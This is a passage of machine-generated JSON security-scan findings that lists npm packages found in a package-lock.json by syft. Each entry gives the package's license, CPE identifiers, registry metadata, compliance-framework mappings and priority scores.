Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "0cce3cd1fd3c13cf", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: read-cache 1.0.0", "title": "read-cache 1.0.0", "description": "Package discovered: read-cache 1.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "5f64d7de79050a02", "name": "read-cache", "version": "1.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:read-cache:read-cache:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:read-cache:read_cache:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:read_cache:read-cache:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:read_cache:read_cache:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:read:read-cache:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:read:read_cache:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/read-cache@1.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/read-cache/-/read-cache-1.0.0.tgz", "integrity": "sha512-Owdv/Ft7IjOgm/i0xvNDZ1LrRANRfew4b2prF3OWMQLxLfu3bS8FVhCsrSCMK4lR56Y9ya+AThoTpDCTxCmpRA==", "dependencies": { "pify": "^2.3.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c7ae55737c4393af", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: readable-stream 2.3.8", "title": "readable-stream 2.3.8", "description": "Package discovered: readable-stream 2.3.8", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "deca1a198ab80d23", "name": "readable-stream", "version": "2.3.8", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:readable-stream:readable-stream:2.3.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:readable-stream:readable_stream:2.3.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:readable_stream:readable-stream:2.3.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:readable_stream:readable_stream:2.3.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:readable:readable-stream:2.3.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:readable:readable_stream:2.3.8:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/readable-stream@2.3.8", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "dependencies": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "303fe49ee8d1f69a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: readable-stream 3.6.2", "title": "readable-stream 3.6.2", "description": "Package discovered: readable-stream 3.6.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "066e44c97461677f", "name": "readable-stream", "version": "3.6.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:readable-stream:readable-stream:3.6.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:readable-stream:readable_stream:3.6.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:readable_stream:readable-stream:3.6.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:readable_stream:readable_stream:3.6.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:readable:readable-stream:3.6.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:readable:readable_stream:3.6.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/readable-stream@3.6.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-3.6.2.tgz", "integrity": "sha512-9u/sniCrY3D5WdsERHzHE4G2YCXqoG5FTHUiCC4SIbr6XcLZBY05ya9EKjYek9O5xOAwjGq+1JdGBAS7Q9ScoA==", "dependencies": { "inherits": "^2.0.3", "string_decoder": "^1.1.1", "util-deprecate": "^1.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9230ea38673dd70b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: readdirp 3.6.0", "title": "readdirp 3.6.0", "description": "Package discovered: readdirp 3.6.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "beb5f9a5d33de00e", "name": "readdirp", "version": "3.6.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:readdirp:readdirp:3.6.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/readdirp@3.6.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/readdirp/-/readdirp-3.6.0.tgz", "integrity": "sha512-hOS089on8RduqdbhvQ5Z37A0ESjsqz6qnRcffsMU3495FuTdqSm+7bhJ29JvIOsBDEEnan5DPu9t3To9VRlMzA==", "dependencies": { "picomatch": "^2.2.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ec316d1c56cfd200", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: recharts 2.15.4", "title": "recharts 2.15.4", "description": "Package discovered: recharts 2.15.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "98e64f0b2bbef0ce", "name": "recharts", "version": "2.15.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:recharts:recharts:2.15.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/recharts@2.15.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/recharts/-/recharts-2.15.4.tgz", "integrity": "sha512-UT/q6fwS3c1dHbXv2uFgYJ9BMFHu3fwnd7AYZaEQhXuYQ4hgsxLvsUXzGdKeZrW5xopzDCvuA2N41WJ88I7zIw==", "dependencies": { "clsx": "^2.0.0", "eventemitter3": "^4.0.1", "lodash": "^4.17.21", "react-is": "^18.3.1", "react-smooth": "^4.0.4", "recharts-scale": "^0.4.4", "tiny-invariant": "^1.3.1", "victory-vendor": "^36.6.8" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "249969671e277623", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: recharts-scale 0.4.5", "title": "recharts-scale 0.4.5", "description": "Package discovered: recharts-scale 0.4.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "b982e93a08325fbd", "name": "recharts-scale", "version": "0.4.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:recharts-scale:recharts-scale:0.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:recharts-scale:recharts_scale:0.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:recharts_scale:recharts-scale:0.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:recharts_scale:recharts_scale:0.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:recharts:recharts-scale:0.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:recharts:recharts_scale:0.4.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/recharts-scale@0.4.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/recharts-scale/-/recharts-scale-0.4.5.tgz", "integrity": "sha512-kivNFO+0OcUNu7jQquLXAxz1FIwZj8nrj+YkOKc5694NbjCvcT6aSZiIzNzd2Kul4o4rTto8QVR9lMNtxD4G1w==", "dependencies": { "decimal.js-light": "^2.4.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "0c07927a54487fe7", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: redis-errors 1.2.0", "title": "redis-errors 1.2.0", "description": "Package discovered: redis-errors 1.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c6c6f81fb8ed6f43", "name": "redis-errors", "version": "1.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:redis-errors:redis-errors:1.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:redis-errors:redis_errors:1.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:redis_errors:redis-errors:1.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:redis_errors:redis_errors:1.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:redis:redis-errors:1.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:redis:redis_errors:1.2.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/redis-errors@1.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/redis-errors/-/redis-errors-1.2.0.tgz", "integrity": "sha512-1qny3OExCf0UvUV/5wpYKf2YwPcOqXzkwKKSmKHiE6ZMQs5heeE/c8eXK+PNllPvmjgAbfnsbpkGZWy8cBpn9w==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "38d5b601f3f165a4", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: redis-parser 3.0.0", "title": "redis-parser 3.0.0", "description": "Package discovered: redis-parser 3.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "d5b8e01dbe4fdde4", "name": "redis-parser", "version": "3.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:redis-parser:redis-parser:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:redis-parser:redis_parser:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:redis_parser:redis-parser:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:redis_parser:redis_parser:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:redis:redis-parser:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:redis:redis_parser:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/redis-parser@3.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/redis-parser/-/redis-parser-3.0.0.tgz", "integrity": "sha512-DJnGAeenTdpMEH6uAJRK/uiyEIH9WVsUmoLwzudwGJUwZPp80PDBWPHXSAGNPwNvIXAbe7MSUB1zQFugFml66A==", "dependencies": { "redis-errors": "^1.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "73e41b20b413651d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: rentaldrivego 1.0.0", "title": "rentaldrivego 1.0.0", "description": "Package discovered: rentaldrivego 1.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "784a87ea0f6f2516", "name": "rentaldrivego", "version": "1.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:rentaldrivego:rentaldrivego:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/rentaldrivego@1.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "", "integrity": "", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "7ebb1ff31601df05", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: require-directory 2.1.1", "title": "require-directory 2.1.1", "description": "Package discovered: require-directory 2.1.1", "remediation": "Track and scan dependencies.", "references": [], "tags": 